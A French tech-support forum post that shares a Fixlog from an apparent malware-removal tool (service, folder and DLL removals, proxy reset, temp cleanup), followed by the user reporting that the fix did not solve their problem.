2017-05-11 13:18 - 2017-04-28 01:58 - 00547840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Input.dll
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
WINIO => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\WINIO => clé supprimé(es) avec succès
WINIO => service supprimé(es) avec succès
C:\ProgramData\Gaming Center => déplacé(es) avec succès
C:\Program Files (x86)\MSI\Dragon Gaming Center => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll => déplacé(es) avec succès
C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll => déplacé(es) avec succès
C:\WINDOWS\system32\Windows.Gaming.Input.dll => déplacé(es) avec succès
Impossible de restaurer Hosts.
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 32768 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 25941675 B
Java, Flash, Steam htmlcache => 492 B
Windows/system/drivers => 2994199 B
Edge => 13824 B
Chrome => 0 B
Firefox => 378998108 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 0 B
LocalService => 2474 B
NetworkService => 0 B
bilal => 323538776 B
RecycleBin => 10407085 B
EmptyTemp: => 707.6 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
Fin de Fixlog 16:07:23
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
Merci d'avoir répondu, mais malheureusement cela n'a pas marché
J'ai aussi bloqué tous mes programmes au démarrages via le gestionnaire des tâches au cas où mais ça ne fonctionne pas non plus